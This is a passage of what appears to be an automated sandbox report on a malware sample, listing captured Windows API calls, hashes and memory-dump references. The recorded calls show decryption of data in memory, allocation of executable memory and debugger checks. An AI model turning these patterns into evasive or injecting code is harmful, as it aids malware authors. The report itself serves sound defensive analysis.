                                                                                                                                                                                • Opcode ID: db77324635a61a33b336a5959b94022d786ca668e30c997987dfcd5cfb7a18cf
                                                                                                                                                                                • Instruction ID: 3ddb548dbba2c2b8736bbc26e1d4288ce335c0ff014b5c0101c4ac71560596a4
                                                                                                                                                                                • Opcode Fuzzy Hash: db77324635a61a33b336a5959b94022d786ca668e30c997987dfcd5cfb7a18cf
                                                                                                                                                                                • Instruction Fuzzy Hash: 81E0E5B913012357EB332679BC0476B3E88EF022B0F154390EE54B21C7CB62C82082E1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00596C42,00000000,00000000,?,00000000,00000001,00000000,?,00596670,00000000,00000000,?), ref: 00596B9E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675754301.0000000000596000.00000040.00001000.00020000.00000000.sdmp, Offset: 00596000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_596000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                • Instruction ID: 6b0e6a68b1c6959a77c7b4d67502ab6a0511af10cc2f60e3e891f9fa85543931
                                                                                                                                                                                • Opcode Fuzzy Hash: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                • Instruction Fuzzy Hash: 91D05E36600228BBEF106FD4DC06FA9B79CEF856A0F108025FE589B340DA72BE1087D4
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8D3F
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D8D49
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8D78
                                                                                                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D8D99
                                                                                                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 005D8DB1
                                                                                                                                                                                • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 005D8DD5
                                                                                                                                                                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 005D8DF1
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D8DFE
                                                                                                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 005D8E08
                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8E14
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8D30
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8D68
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                • API String ID: 3718126946-947817771
                                                                                                                                                                                • Opcode ID: e652b6c25ae09001d370bb6b9ada12c503845e79d48c19e77524901969939c72
                                                                                                                                                                                • Instruction ID: c4de93132a51137511e764052ca59ca0b672f9fcda5b644145095bbd7cdeb70a
                                                                                                                                                                                • Opcode Fuzzy Hash: e652b6c25ae09001d370bb6b9ada12c503845e79d48c19e77524901969939c72
                                                                                                                                                                                • Instruction Fuzzy Hash: E5310B75A41209EBDB24CF98CC49FBE7B79FB14705F10854BF501AA280CBB4A944DB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 012011CC
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,?), ref: 01201204
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,?), ref: 01201222
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 01201230
                                                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 0120127B
                                                                                                                                                                                • ConnectNamedPipe.KERNEL32(?,00000001), ref: 0120129F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Module$FileName$ConnectCriticalEnterHandleNamedPipeSectionSystemTime
                                                                                                                                                                                • String ID: <
                                                                                                                                                                                • API String ID: 3210837935-1997997181
                                                                                                                                                                                • Opcode ID: 44379ee36cd158ae32acd011499d9d53617427feb31759c46acdd421b1deecba
                                                                                                                                                                                • Instruction ID: a92d1c5f1656713412b082096b0a39aeb9c7580a99be5fdab181ec41568c6917
                                                                                                                                                                                • Opcode Fuzzy Hash: 44379ee36cd158ae32acd011499d9d53617427feb31759c46acdd421b1deecba
                                                                                                                                                                                • Instruction Fuzzy Hash: DE81557A614701CFD325CF38E989AAAB7F4FB98304F044A2DE29ACB241D734E945CB15
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 005D2564
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 005D2590
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 005D25B0
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D25CA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$Alloc$Free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3668210933-0
                                                                                                                                                                                • Opcode ID: 4a6afd865f4908b17560f3f28a3234c48b09a2a78153ecdc08034e51ebf9035e
                                                                                                                                                                                • Instruction ID: 2aae3e0544dfa63bf4282d41cbc3e2995572c84338ca3da3ce29d2ae7cda0608
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a6afd865f4908b17560f3f28a3234c48b09a2a78153ecdc08034e51ebf9035e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E513CB5E00209EFDB14CF94C895FAEBBB5BB58300F10854AF605AB390D774EA44CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 005D72BD
                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 005D72F9
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 005D7329
                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 005D7343
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 005D73A9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852505512-0
                                                                                                                                                                                • Opcode ID: e603156103c907d7e331a85215c2445ea038caa98f4abe754eccb7877b6788dc
                                                                                                                                                                                • Instruction ID: acfd22c320a403d7cbe28d2148533ddf5ac1078aee8ac0885722b1fa8527bd80
                                                                                                                                                                                • Opcode Fuzzy Hash: e603156103c907d7e331a85215c2445ea038caa98f4abe754eccb7877b6788dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 69414B74A04209DFDB18DF98C885BEEBBB5BF48300F14855AE815AB391D775D944CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 012097EF
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 012097F9
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 01209806
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: 980a7029f318b182156a65a5e67b4ce5306eb2437525b821d6f5171a1926bdb1
                                                                                                                                                                                • Instruction ID: d63f693cb41c7f6fae2c6588770352dd5009badb75bfb8ea1782d71a4a2875b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 980a7029f318b182156a65a5e67b4ce5306eb2437525b821d6f5171a1926bdb1
                                                                                                                                                                                • Instruction Fuzzy Hash: 1631D67591121D9BCB22DFA8D8887DDBBB4BF58310F5042EAE50CA7291EB749F818F44
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,0120BBB9,00000003,01234478,0000000C,0120BCCC,00000003,00000002,00000000,?,0120A5F0,00000003), ref: 0120BC04
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0120BBB9,00000003,01234478,0000000C,0120BCCC,00000003,00000002,00000000,?,0120A5F0,00000003), ref: 0120BC0B
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0120BC1D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: ee4eeaf813c84174cfc93af7492a646e0161c2e534361dd2f006f45f738836be
                                                                                                                                                                                • Instruction ID: 46e67c322ac54aed1e7c95d3a6e371efca52a3eeadb46794f07e0d35a786fe3f
                                                                                                                                                                                • Opcode Fuzzy Hash: ee4eeaf813c84174cfc93af7492a646e0161c2e534361dd2f006f45f738836be
                                                                                                                                                                                • Instruction Fuzzy Hash: FAE04F31010104AFCF22AF54D90C9583F79FF20241F044514FA04571A2CF75D981DB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0120D43F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2325560087-3916222277
                                                                                                                                                                                • Opcode ID: b7ce76739351c1ed842db38b6468cb9a4cab3b85635e61958dbbbf839a1d8b09
                                                                                                                                                                                • Instruction ID: 5433db911014ec1b12688f71c576a56aec2ddead9443ab3fef6ef3c0192ec4e1
                                                                                                                                                                                • Opcode Fuzzy Hash: b7ce76739351c1ed842db38b6468cb9a4cab3b85635e61958dbbbf839a1d8b09
                                                                                                                                                                                • Instruction Fuzzy Hash: D451B071D1120A9FEB25CFE9E48579EBFF4EB44324F19856AC904EB285D330A590CF60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /
                                                                                                                                                                                • API String ID: 0-2043925204
                                                                                                                                                                                • Opcode ID: d88dcec532daa554a8006dfe7acd24f6cbf7df4f59e41a40c06e7650d74d5468
                                                                                                                                                                                • Instruction ID: 097842060d5130883c90c23f504170d4377284e45384e3a45b5a3e9cf0669e25
                                                                                                                                                                                • Opcode Fuzzy Hash: d88dcec532daa554a8006dfe7acd24f6cbf7df4f59e41a40c06e7650d74d5468
                                                                                                                                                                                • Instruction Fuzzy Hash: B341167695021AAFDB359EBCDD8CDBB7B78EB84314F504369EA05C71C2E6309E818B50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • HeapWalk.KERNEL32(00000000,00000000,?,?,?,?,01240918), ref: 01204E76
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 01204E7C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$ProcessWalk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3245327933-0
                                                                                                                                                                                • Opcode ID: d9f76d4e8bfb474f7ef4d9d0196b9e0a2f29eb47ee69a28450157a57a916812b
                                                                                                                                                                                • Instruction ID: 543a2bd9fd91619992fe5a59f59a7e27839db8a2221a1cd9a504b718babd620e
                                                                                                                                                                                • Opcode Fuzzy Hash: d9f76d4e8bfb474f7ef4d9d0196b9e0a2f29eb47ee69a28450157a57a916812b
                                                                                                                                                                                • Instruction Fuzzy Hash: FCA17C79600289CFE764CF28D988BEA77E5FB88304F018569EA4DCB345D730AA41CF15
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • ReleaseMutex.KERNEL32(-01240A30,?,?,?,01240918,?,?,012031E6,?,?,?,?,?,?,?), ref: 012037CD
                                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(?,?,?,0012A7FD), ref: 012037F8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleMutexNamedPipeReleaseState
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 9172061-0
                                                                                                                                                                                • Opcode ID: 1250f229d64a007e6db86461c2e8bae41d308d088add6c13f73de41411935036
                                                                                                                                                                                • Instruction ID: 33640b26779d5a4a1444b751d0a2948ab11a0ea2eed1ef0b770cf891b95f2211
                                                                                                                                                                                • Opcode Fuzzy Hash: 1250f229d64a007e6db86461c2e8bae41d308d088add6c13f73de41411935036
                                                                                                                                                                                • Instruction Fuzzy Hash: 336146B96156418FE364CF38E988A9AB7E5FB88300F044A2DE69AC7341D770F981CB15
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d1e7c5369357f1c5f05ab65d1a8e3090e1c45c6bed585981b952813e61400b2
                                                                                                                                                                                • Instruction ID: 8144d480c0d9c547360a311d0987a844974068ce5896eb4a018e7eb31b0e7b22
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d1e7c5369357f1c5f05ab65d1a8e3090e1c45c6bed585981b952813e61400b2
                                                                                                                                                                                • Instruction Fuzzy Hash: FB13237590871ACFC715DF08C18056AFBE2FBC8704F168A5EE9992B366D730E945CB82
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0120A0C5,?,?,00000008,?,?,0120967C,00000000), ref: 0120A2F7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                • Opcode ID: 0bf42d6c007f5fbb3f20a46385b83e177e7e8dfb6d23a300bbf7ff6f30a8fda5
                                                                                                                                                                                • Instruction ID: 26256d5c18ff5f25795fcede499c432895e693233f398f6ac6cadcecc2f1ef72
                                                                                                                                                                                • Opcode Fuzzy Hash: 0bf42d6c007f5fbb3f20a46385b83e177e7e8dfb6d23a300bbf7ff6f30a8fda5
                                                                                                                                                                                • Instruction Fuzzy Hash: 99B129315207099FE716CF2CC48AB657BA0FF45364F658658EA9ACF2E2C375E981CB40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateNamedPipeA.KERNEL32(?,?,000001F1,?,-00002354,-01240A1C,?,0011B065), ref: 01213418
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateNamedPipe
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2489174969-0
                                                                                                                                                                                • Opcode ID: 7ce2e04dfe8cb86b027a6766a07a217127d25afba6035ee10f902c4b8dad5c6d
                                                                                                                                                                                • Instruction ID: ee8ae7baed7c339bab6da0dbdd6bac31789ceb16032b47f43f6aa93e711c35f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce2e04dfe8cb86b027a6766a07a217127d25afba6035ee10f902c4b8dad5c6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 93A18B796142058FD368CF3CDA88AA6B7E5FB98304F00892DE69ADB748D730E945CF15
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(?,?,?,?), ref: 01203387
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleNamedPipeState
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2980779144-0
                                                                                                                                                                                • Opcode ID: b6c681259c0b009aaf82dfad6fbf3f99abd5f77e03e39e7bb539801a858a55d5
                                                                                                                                                                                • Instruction ID: d416c1e97de80d26b05b8f051e7b578ece8e4e607ce53e0c2094284536783246
                                                                                                                                                                                • Opcode Fuzzy Hash: b6c681259c0b009aaf82dfad6fbf3f99abd5f77e03e39e7bb539801a858a55d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 41716C796016058FE325CF28E589EA6B7F4FB88300F04896DE64ACB755D730F985CB15
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675754301.0000000000596000.00000040.00001000.00020000.00000000.sdmp, Offset: 00596000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_596000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
